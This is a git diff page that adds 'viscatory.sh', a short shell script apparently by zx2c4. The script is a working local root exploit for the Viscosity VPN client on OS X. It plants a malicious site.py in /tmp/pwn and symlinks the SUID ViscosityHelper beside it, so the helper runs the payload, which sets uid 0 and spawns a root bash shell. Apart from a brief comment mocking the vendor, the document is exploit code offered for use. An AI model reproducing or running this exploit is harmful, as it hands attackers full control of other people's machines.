summaryrefslogtreecommitdiffstats
path: root/viscatory.sh
diff options
context:
space:
mode:
Diffstat (limited to 'viscatory.sh')
-rwxr-xr-xviscatory.sh32
1 files changed, 32 insertions, 0 deletions
diff --git a/viscatory.sh b/viscatory.sh
new file mode 100755
index 0000000..4f323b3
--- /dev/null
+++ b/viscatory.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+#
+##########################
+# Viscatory #
+# #
+# zx2c4 #
+##########################
+#
+# After the hullabaloo from the Tunnelblick local root, savy Mac users
+# began defending Viscosity, another OS X VPN client. They figured, since
+# they spent money on Viscosity, surely it would be better designed than
+# the free alternative.
+#
+# Unfortunately, this exploit took all of 2 minutes to find. DTrace for
+# the win. Here, the SUID helper will execute site.py in its enclosing
+# folder. A simple symlink, and we have root.
+
+echo "[+] Crafting payload."
+mkdir -p -v /tmp/pwn
+cat > /tmp/pwn/site.py <<_EOF
+import os
+print "[+] Cleaning up."
+os.system("rm -rvf /tmp/pwn")
+print "[+] Getting root."
+os.setuid(0)
+os.setgid(0)
+os.execl("/bin/bash", "bash")
+_EOF
+echo "[+] Making symlink."
+ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root
+echo "[+] Running vulnerable SUID helper."
+exec /tmp/pwn/root